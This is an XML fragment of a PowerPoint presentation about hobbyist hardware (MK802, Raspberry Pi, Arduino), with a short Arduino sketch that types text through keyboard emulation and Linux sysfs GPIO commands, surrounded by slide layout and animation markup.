              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>amzn.to/qJUu4P</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MK802</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>aspberry Pi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.raspberrypi.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\adrian\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4XAWCH18\MC9004316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31" y="9930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6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7230666" y="241176"/>
            <a:ext cx="1684734" cy="3581575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>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12562" y="2025615"/>
            <a:ext cx="1496469" cy="1376523"/>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60051" y="3402138"/>
            <a:ext cx="2051058" cy="1367372"/>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960051" y="1676400"/>
            <a:ext cx="1210774" cy="1354553"/>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28010" y="2895600"/>
            <a:ext cx="2129817" cy="1550507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 1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602500" y="4446107"/>
            <a:ext cx="1904325" cy="159431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3356" y="4506437"/>
            <a:ext cx="2857899" cy="1886213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2974443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5" presetID="3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7" presetID="3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style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="90"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="63" presetID="3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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="90"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1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75" presetID="3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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="90"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="10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additive="base">
                                        <p:cTn id="8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87" presetID="31" presetClass="entr" presetSubtype="0" fill="hold" nodeType="with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p:cTn id="89" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="90"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="10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Source  Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="5715000"/>
            <a:ext cx="39167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dirty="0"/>
              <a:t>Demo Time!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="4572000" cy="3335272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> setup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>pinMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0</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INPUT</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
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:b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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> loop</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>if</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>digitalRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>0</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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Keyboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>"high"</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delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1000</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4800600"/>
            <a:ext cx="7355025" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>"4"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>gpio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>export </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>"out"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>gpio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>gpio4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>direction </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>"1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
